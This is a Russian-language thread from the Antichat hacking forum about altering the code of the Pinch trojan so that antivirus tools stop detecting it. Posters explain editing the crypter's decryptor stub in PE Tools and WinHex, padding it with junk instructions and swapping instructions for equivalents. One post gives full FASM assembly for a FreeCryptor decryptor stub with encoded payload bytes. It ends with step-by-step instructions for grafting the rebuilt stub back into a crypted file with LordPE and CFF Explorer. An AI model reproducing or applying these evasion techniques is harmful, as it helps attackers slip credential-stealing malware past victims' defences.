Форум АНТИЧАТ - изменение hex кода троя

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)

- - изменение hex кода троя (https://forum.antichat.xyz/showthread.php?t=55840)

изменение hex кода троя

Ребят, наткулся я тут недавно на вот такую статейку по изменению hex кода, решил проделать такое с pinch'ем, но как только я начинаю затирать/менять символы на другие - трой перестаёт работать. В чём тут может быть проблемма ?

Надо знать какие именно изменять символы и что они означают. Возьми свежий PE Tools с сайта wasm.ru,открой его,открой криптованный пинч и в редакторе секций выбери последнюю секцию....дальше жми Disassemble,появится код декриптора,далее просматривай команды,ищи ту которую можно изменить без вреда для файла. Потом через WinHex ищешь hex-код той комманды и меняешь ее.
Сейчас посмотрел декриптор,там в конце много пропусков (add [eax],al)...можно туда добавить кучу бесполезных комманд.

Умельцы ачата, призываю вас взяться за снятие видео на данную тему, имхо не только мне интересно будет. Заранее спс.

А смысл др ненужные команды добовлять?нам надо главный код поменять а не чтото еще приписать,если что припишем серовнопалить будет,и не факт что заработает.

Добавлять мусорные команды после кода декриптора не имеет наверно никакого смысла,так как они не будут выполнятся и скорее всего будут игнорироваться антивирусом!Если же это делать вручьную,то надо вырезать новую секцию с дешифровщиком и перекомпилировать её с предварительной вставкой мусора между
основными коммандами,а так же и сами эти инструкции можно перебить на синонимы ,а затем поместить её на старое место!Или делать это программно,используя дизассемблерный движок для анализа кода и получения длин комманд!
Впорчем,что то я туть заморочилась!
:)

Модификация кода декриптора нет ничего проще.
Вот сам код взятый из FreeCryptor v 0.3b build 002 при изначальных настройках :

Цитата:

;КОМПИЛИРУЕМ ФАСМОМ

OEP = 402317h ; OEP ПРОГРАММЫ УКАЖИТЕ САМИ
use32

call $+5
pop esi
sub esi,$-1
push ds
cwde
xor edx, edx
lea eax,[esi+loc_1]
push eax
wait
push fs
pop ds

mov ecx, [edx]
wait
push ecx
push esp
pop dword [edx]
nop
nop
mov fs, [esp+8]
jmp dword [edx+4]

loc_1:

pop eax
push eax
xor edx, edx
push edx
cmp eax, 1
wait
nop
nop
loc_2:
inc eax
nop
nop
mov dl, [eax]
mov [esp], edx
nop
fld dword [esp]
nop
fsqrt
fstp dword [esp-4]
mov ebx, [esp-4]
xor ebx, 1C1DFCC2h
jnz loc_2
jz loc_3

db 62h

loc_3:
call eax
nop
pop edx
xor eax, eax
mov edx, [esp+8]
nop
pop dword [fs:eax]
nop
add edx, 8
push edx
pop esp
pop edx
mov ecx, OEP
mov dword[ecx+4], 0E8000000h ;восстановление оригинальных байт на OEP,меняйте на то что будет в вашем случае
mov dword [ecx], 0BC3A009Ah ;И тут тоже
mov ebx, esp
push 7472410h ;Тут тоже нужно будет поменять до этой метки----> @@@@,на то что будет в вашем варианте
push 0F8F8F8F8h
push 7071107h
push 7471707h
push 7070590h
push 74737F2h
push 70707F3h
push 7473303h
push 7070610h
push 7473FEEh
push 7070507h
push 7474707h
push 0E7F8FBEBh
push 84002303h
push 0C6EBC784h
push 87EB845Fh
push 0F8FF4FCEh
push 27168E00h
push 0ECC4D0D9h
push 0F90F4F9Eh
push 0F8274F0Eh
push 6B0B1087h
push 274F3E10h
push 0EE26272Bh
push 0F94F7Eh
push 1F168E01h
push 0D1268Eh
push 707072Bh
push 0EF87C384h
push 0F739797h
push 87EB845Fh
push 233B8697h
push 2FC38497h
push 0F8EC0573h
push 97973F87h
push 4700C784h
push 48C319Fh
;@@@@
push esp
push 94h
pop ecx

loc_4:
xor dword [esp+ecx+3], 7
loop loc_4
retn

Порядок действий таков:
Криптуем какое нить файло.
Смотрим его OEP к примеру утилитой LordPe.
Удаляем последнию секцию.
В выше приведённом коде ставим этот Ентру поинт.
Изменяем сам код,как хотим без нарушения работоспособности.
Компилируем в бинарный файл.
Открываем криптованный файл в котором удалили секцию расшифровщика в CFF Explorer.
Щелкаем по Section Headers.
Правой кнопкой мыши, Add Section(File Data) открыаем и добавляем в новую
секцию наш бинарный файл.
Сохраняем!
ВСЁ!
ЗЫ..забыла сказать,там в комментах написано...

Если не сложно выложите программу LordPe.
Поиск юзал так что орать не надо...

Плохо однако юзал!

>> Если не сложно выложите программу LordPe..
http://cracklab.ru/download.php?action=list&n=MzU=